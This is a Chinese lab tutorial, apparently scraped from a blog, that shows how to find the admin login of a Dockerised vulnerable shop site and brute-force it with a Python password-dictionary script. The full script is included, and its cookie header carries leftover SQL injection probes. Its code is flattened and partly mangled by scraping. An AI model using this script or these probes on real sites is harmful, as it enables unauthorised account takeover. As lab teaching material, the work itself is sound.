用python写一个爆破网站管理员密码脚本

编程入门行业动态更新时间:2024-10-11 07:36:01

用python写一个爆破网站管理员密码<a href=https://www.elefans.com/category/jswz/34/1771291.html style= 脚本"/>

用python写一个爆破网站管理员密码脚本

文章目录

- - 拉取环境
  - 寻找登录界面
  - 寻找参数
  - 编写脚本
  - 试验效果

拉取环境

靶场环境是docker环境，把docker靶场映射到本机的7777端口，以便访问

docker pull docker.io/zksmile/vul
docker run -d -p 7777:80 --name shop zksmile/vul:secshop_v2

首页：

寻找登录界面

在注用户注册页面发现admin不能注册，猜测admin为管理员账户

通过爆破目录发现 192.168.171.102:7777/admin.php 为管理登录界面

寻找参数

用burp拦截观察http数据包，关于burp的使用可以看这篇文章 DVWA 暴力破解

可以看到用户名密码是用post传输的，密码错误的响应值是 -1，猜测密码正确的话返回值是1

编写脚本

根据以上这些信息进行编写python脚本，代码解释我放到注释里了：

import sys
import requests
import jsonlogo = r"""____             _         _____                  
| __ ) _ __ _   _| |_ ___  |  ___|__  _ __ ___ ___ 
|  _ \| '__| | | | __/ _ \ | |_ / _ \| '__/ __/ _ \
| |_) | |  | |_| | ||  __/ |  _| (_) | | | (_|  __/
|____/|_|   \__,_|\__\___| |_|  \___/|_|  \___\___|
"""
def brute(url, header ,params):i = 0#查看文件行数with open('passwd.txt','r') as f:global lineslines = f.readlines()lines = str(len(lines))username = 'admin'    #这里username是固定的#打开密码字典文件for passwd in open("passwd.txt"):i += 1password = passwd.strip()   #strip删除开头和结尾的空格payload = {                 #指定post发送的数据'loginName':username,'loginPwd':password,'verify':'DGHA'}#发送post请求response = requests.post(url=url, data=payload, params=params, headers=header)#获取结果result = json.loads(response.content)#如果结果值为1，则密码正确，退出程序!!!if result["status"] == 1:print('------------------------------------')print("\033[92m" + 'password is : ' + password + '\n' + "\033[0m")sys.exit()#输出测试值print("\033[91m" + '[*]' + str(i) + '/'+ lines + ' ' + password + "\033[0m",end='\r')return idef main():print(logo)#proxies = {'http':'http://127.0.0.1:8080'}url = "http://192.168.171.102:7777/index.php"#指定user_agent和cookieheader = {'User_Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0','Cookie':'areaId2=110100; WSTMALLviewGoods=think%3A%5B%22102%22%2C%22258%22%2C%22103%22%2C%22101%22%2C%22101%2Bor%2B1%253D1%22%2C%2287654%2Bor%2B1%253D1%22%2C%22101%2Border%2Bby%2B1%22%2C%22101%2Border%2Bby%2B10%22%2C%22101%2Border%2Bby%2B30%22%2C%22101%2Border%2Bby%2B300%22%2C%22101%2Border%2Bby%2B30000%22%2C%22101%2B%2Band%2B1%253D1%22%2C%22260%22%2C%22101%2Band%2B1%253D1%22%2C%22110%22%5D; loginName=test1; loginPwd=NWExMDVlOGI5ZDQwZTEzMjk3ODBkNjJlYTIyNjVkOGE%3D; PHPSESSID=88sjapamh02cbo40fcj9flc1j5; WSTMALLbstreesAreaId3=110101'}#指定get方式传参的值params = {'m':'Admin','c':'index','a':'login'}i = brute(url, header, params)print('-----------------------------------------------------')print("\033[91m" +'尝试了' + str(i) + '次，字典中没有正确密码!' + "\033[0m")if __name__ == "__main__":main()